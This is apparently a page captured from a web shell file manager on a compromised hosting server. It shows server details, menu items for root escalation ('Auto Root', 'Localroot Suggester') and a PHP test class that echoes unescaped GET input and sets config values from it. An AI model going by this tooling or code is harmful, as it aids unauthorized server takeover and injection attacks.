Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
a2-optimized /
app /
classes /
Delete
Unzip
Name
Size
Permission
Date
Action
class.A2OptAction.php
16.53
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptBase.php
34.32
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptDrupal.php
27.68
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptDrupal8.php
23.09
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla.php
28.43
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla25.php
178
B
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla3.php
182
B
-rw-r--r--
2025-04-29 15:40
class.A2OptMagento.php
16.07
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptMemcache.php
7.77
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptOpenCart.php
25.74
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptPDO.php
683
B
-rw-r--r--
2025-04-29 15:40
class.A2OptPrestaShop.php
21.11
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptStaging.php
1.87
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptTest.php
5.06
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptTurboCache.php
14.24
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptWordPress.php
48.93
KB
-rw-r--r--
2025-04-29 15:40
class.A2Optimize.php
5.25
KB
-rw-r--r--
2025-04-29 15:40
class.MemcacheLite.php
5.22
KB
-rw-r--r--
2025-04-29 15:40
class.MemcachedInstance.php
3.82
KB
-rw-r--r--
2025-04-29 15:40
Save
Rename
<?php class A2OptTest extends A2OptBase { public function test() { header("Content-Type: text/plain"); echo "start {$_GET['test']}\n\n"; switch ($_GET['app']) { case 'wp': $this->wordpress(); break; case 'drupal': case 'drupal 9': $this->drupal(); break; case 'joomla': $this->joomla(); break; case 'magento': $this->magento(); break; case 'ps': $this->prestashop(); break; } } function drupal() { $drupal = $this->get_drupal(); switch ($_GET['test']) { case 'get_setting': var_dump($drupal->get_setting("cache_backends", true)); break; case 'get_variable': var_dump($drupal->get_variable("cache")); break; case 'enable_memcached': $drupal->enable_memcached("unix:///opt/memcached/run/wp/memcached-1.sock"); break; case 'enable_filecache': $drupal->enable_file_cache(); break; case 'disable_memcached': $drupal->disable_memcached(); break; case 'enable_cache': $drupal->enable_core_file_cache(); break; case 'enable_block_cache': $drupal->enable_core_block_cache(); break; case "enable_cache_cron": $drupal->enable_cache_cron(); break; case "disable_cache_cron": $drupal->disable_cache_cron(); break; } echo "end {$_GET['test']}\n\n"; } function magento(){ $magento = $this->get_magento(); switch($_GET['test']) { case "enable_mod_deflate": $magento->enable_mod_deflate(); break; case "disable_mod_deflate": $magento->disable_mod_deflate(); break; case "enable_expires": $magento->enable_expires(); break; case "disable_expires": $magento->disable_expires(); break; case "is_expires": var_dump($magento->is_expires()); break; } } function joomla(){ $joomla = $this->get_joomla(); switch($_GET['test']) { case "is_extension_enabled": var_dump($joomla->is_extension_enabled("PLG_SYSTEM_JCH_OPTIMIZE")); break; case "enable_extension": var_dump($joomla->enable_extension("PLG_SYSTEM_JCH_OPTIMIZE")); var_dump($joomla->is_extension_enabled("PLG_SYSTEM_JCH_OPTIMIZE")); break; case "disable_extension": var_dump($joomla->disable_extension("PLG_SYSTEM_JCH_OPTIMIZE")); var_dump($joomla->is_extension_enabled("PLG_SYSTEM_JCH_OPTIMIZE")); break; case "enable_jch_minimum": $joomla->set_extension_params("PLG_SYSTEM_JCH_OPTIMIZE",array("css"=>"0")); break; case "get_variable": $name = "caching"; if(isset($_GET['name'])){ $name = $_GET['name']; } echo $joomla->get_variable($name); break; case "set_variable": $value = 1; $name = "caching"; if(isset($_GET['value'])){ $value = $_GET['value']; } if(isset($_GET['name'])){ $name = $_GET['name']; } var_dump($joomla->set_variable("{$name}","{$value}")); break; case "uncomment_variable": header("Content-Type: text/plain;"); echo $joomla->uncomment_variable("caching"); break; case "comment_variable": header("Content-Type: text/plain;"); echo $joomla->uncomment_variable("caching"); break; } } function wordpress(){ } function prestashop(){ } function debug($msg){ echo "\n$msg\n"; } function get_drupal(){ return new A2OptDrupal((object) array('path'=>'/home/wp/public_html/drupal','domain'=>'example.com','instance'=>array('id'=>1,'socket'=>'unix:///opt/memcached/run/wp/memcached-1.sock'))); } function get_magento(){ return new A2OptMagento((object) array('path'=>'/home/wp/public_html/mage2','domain'=>'example.com','instance'=>array('id'=>1,'socket'=>'unix:///opt/memcached/run/wp/memcached-1.sock'))); } function get_joomla(){ return new A2OptJoomla((object) array('path'=>'/home/wp/public_html/joomla','domain'=>'example.com','instance'=>array('id'=>1,'socket'=>'unix:///opt/memcached/run/wp/memcached-1.sock'))); } }